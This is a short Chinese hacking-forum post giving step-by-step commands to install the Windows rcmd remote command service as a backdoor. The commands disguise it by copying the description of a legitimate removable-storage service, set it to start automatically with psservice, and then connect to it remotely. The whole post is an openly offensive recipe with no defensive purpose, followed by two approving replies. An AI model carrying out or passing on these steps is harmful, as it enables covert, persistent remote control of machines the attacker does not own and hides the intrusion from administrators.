windows自带的rcmd后门使用方法整理
windows自带的rcmd后门使用方法整理文章作者:pt007[at]vip.sina.com版权所有,转载请注明信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com]www.eviloctal.com[/url]) 1、rcmdsvc /install //安装后的服务名为:Remote Command Service (rcmdsvc),建议上传至windows目录怎么用命令行改服务名和描述: sc \\127.0.0.1 query rcmdsvc //查询整个服务 sc \\127.0.0.1 qdescription rcmdsvc //查询服务的描述 sc \\127.0.0.1 description rcmdsvc "管理和编录可移动媒体并操作自动化可移动媒体设备。如果这个服务被停止,依赖可移动存储的程序,如备份和远程存储将放慢速度。如果禁用这个服务,所有专依赖这个服务的服务将无法启动。" //修改服务的描述 D:\pt007\f\Pstools2.11>psservice \\127.0.0.1 setconfig rcmdsvc auto //设置服务为自动启动 2、net start rcmdsvc 3、rcmd \\127.0.0.1 ver download 顶顶! 不 错哦 !!!!!
页:
[1]